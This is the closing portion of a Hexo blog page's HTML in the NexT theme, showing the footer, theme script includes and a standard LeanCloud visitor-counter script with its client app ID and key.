class="nav-text">看起来有点难</span></a></li></ol></div>
            

          </div>
        </div>
      <!--/noindex-->
      

      

    </div>
  </aside>
  


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; 2017.3 – <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Windylh</span>

  

  
</div>


  <div class="powered-by">Erstellt mit  <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> v3.2.2</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Design – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Mist</a> v7.1.0</div>




        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

    

    
  </div>

  

<script>
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  <script src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>


  


  <script src="/js/utils.js?v=7.1.0"></script>

  <script src="/js/motion.js?v=7.1.0"></script>



  
  


  <script src="/js/schemes/muse.js?v=7.1.0"></script>




  
  <script src="/js/scrollspy.js?v=7.1.0"></script>
<script src="/js/post-details.js?v=7.1.0"></script>



  


  <script src="/js/next-boot.js?v=7.1.0"></script>


  

  

  

  


  


  




  
  
  <script>
    
    function addCount(Counter) {
      var $visitors = $('.leancloud_visitors');
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();

      Counter('get', '/classes/Counter', { where: JSON.stringify({ url }) })
        .done(function({ results }) {
          if (results.length > 0) {
            var counter = results[0];
            
            Counter('put', '/classes/Counter/' + counter.objectId, JSON.stringify({ time: { '__op': 'Increment', 'amount': 1 } }))
            
              .done(function() {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.time + 1);
              })
            
              .fail(function ({ responseJSON }) {
                console.log('Failed to save Visitor num, with error message: ' + responseJSON.error);
              })
          } else {
            
              var $element = $(document.getElementById(url));
              $element.find('.leancloud-visitors-count').text('Counter not initialized! More info at console err msg.');
              console.error('ATTENTION! LeanCloud counter has security bug, see how to solve it here: https://github.com/theme-next/hexo-leancloud-counter-security. \n However, you can still use LeanCloud without security, by setting `security` option to `false`.');
            
          }
        })
        .fail(function ({ responseJSON }) {
          console.log('LeanCloud Counter Error: ' + responseJSON.code + ' ' + responseJSON.error);
        });
    }
    

    $(function() {
      $.get('https://app-router.leancloud.cn/2/route?appId=' + 'G38Wjo4XURoegldByMbpMI2C-gzGzoHsz')
        .done(function({ api_server }) {
          var Counter = function(method, url, data) {
            return $.ajax({
              method: method,
              url: 'https://' + api_server + '/1.1' + url,
              headers: {
                'X-LC-Id': 'G38Wjo4XURoegldByMbpMI2C-gzGzoHsz',
                'X-LC-Key': 'PAvMrVY87vPwX9PBcMLfYmw4',
                'Content-Type': 'application/json',
              },
              data: data
            });
          };
          
            addCount(Counter);
          
        });
    });
  </script>



  

  

  

  

  

  

  

  

  

  

  

  

  

</body>
</html>
